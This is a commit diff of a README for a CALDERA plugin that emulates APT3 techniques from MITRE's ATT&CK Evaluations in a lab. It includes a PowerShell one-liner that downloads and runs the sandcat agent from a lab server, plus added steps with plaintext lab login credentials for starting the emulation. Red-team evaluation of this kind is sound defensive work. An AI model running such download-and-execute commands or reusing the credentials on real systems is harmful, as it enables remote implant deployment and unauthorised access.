README.md, before:

# CALDERA plugin: Eval

## Overview

A plugin supplying CALDERA with the TTPs used within the ATT&CK Evaluations Round 1 (APT3).
For more information see https://attackevals.mitre.org/about-attack-evaluations.html

1. Plugin Installation
2. Lab Setup
3. Execution

## Installation
Clone the Eval plugin into the caldera/plugin directory
```commandline
git clone https://github.com/mitre-attack/evals_caldera.git
```
Add Eval plugin to CALDERA config `conf/local.yml`
```yaml
plugins:
  - evals_caldera
```

Fill out facts in `data/facts/` specific to your setup.

## Environment Setup
[Full Round 1 Environment](https://attackevals.mitre.org/methodology/round1/environment.html)

Minimum requirements:
- Initial host exists within a windows domain
- Remote shared drive is mounted

## Execution

Please read the [full documentation](https://github.com/mitre/caldera/wiki/Plugins-evals) for this plugin.

## Shire Mordor Environment Execution

For use within the Shire Mordor environment deploy 54ndc47 using the following PowerShell command: 
```commandline
$url="http://172.18.39.8:8888/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe -server http://172.18.39.8:8888 -group evals_caldera -v;

```

Commit message:

added example execution steps for use with the Shire Mordor environment

README.md, after:

# CALDERA plugin: Eval

## Overview

A plugin supplying CALDERA with the TTPs used within the ATT&CK Evaluations Round 1 (APT3).
For more information see https://attackevals.mitre.org/about-attack-evaluations.html

1. Plugin Installation
2. Lab Setup
3. Execution

## Installation
Clone the Eval plugin into the caldera/plugin directory
```commandline
git clone https://github.com/mitre-attack/evals_caldera.git
```
Add Eval plugin to CALDERA config `conf/local.yml`
```yaml
plugins:
  - evals_caldera
```

Fill out facts in `data/facts/` specific to your setup.

## Environment Setup
[Full Round 1 Environment](https://attackevals.mitre.org/methodology/round1/environment.html)

Minimum requirements:
- Initial host exists within a windows domain
- Remote shared drive is mounted

## Execution

Please read the [full documentation](https://github.com/mitre/caldera/wiki/Plugins-evals) for this plugin.

## Shire Mordor Environment Execution

For use within the [Shire Mordor environment](https://mordor.readthedocs.io/en/latest/mordor_shire.html) deploy 54ndc47 using the following PowerShell command: 
```commandline
$url="http://172.18.39.8:8888/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe -server http://172.18.39.8:8888 -group evals_caldera -v;

```
Example execution within Shire:    

1) RDP to the public ip of IT001.shire.com. Login - Administrator:P1ls3n! and open up an admin CMD. Close out of the RDP sesion but do not logout the Administrator.    

2) RDP to the public ip of IT001.shire.com. Login - pgustavo:W1n1!2019 and open up an admin CMD and a non-admin PowerShell. Execute the PowerShell command from above. The 54ndc47 agent should now be checked in with CALDERA (172.18.39.8).

3) Browse to the CALDERA UI (http://caldera-public-ip:8888). Login - wardog:B3tt3r! and start an operation using the [ATT&CK Eval APT3 - Full](https://github.com/d4weiss/evals_caldera/blob/master/data/adversaries/ef93dd1b-809b-4a0b-b686-fef549cabbe4.yml) adversary profile.
